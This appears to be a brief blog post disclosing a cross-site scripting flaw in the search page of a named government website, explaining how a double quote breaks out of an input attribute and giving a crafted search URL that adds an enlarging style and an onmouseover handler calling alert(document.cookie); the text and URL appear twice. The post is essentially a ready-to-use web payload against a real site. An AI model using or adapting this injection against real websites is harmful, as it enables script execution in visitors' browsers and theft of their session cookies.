The <> tags are not allowed but the "= can be injected so we can add to the <input> tag a style to enlarge the area and an onmouseover so that a javascript will be fired when the mouse pass over the (enlarged) text input.
We can do also other things but this should be enough.
https://www.cia.gov/search?q=%22%20style%3d%22height:900px;%22%20onMouseOver%3d%22alert(document.cookie)
Screenshot
We can do also other things but this should be enough.
https://www.cia.gov/search?q=%22%20style%3d%22height:900px;%22%20onMouseOver%3d%22alert(document.cookie)
Screenshot
Comments
Post a Comment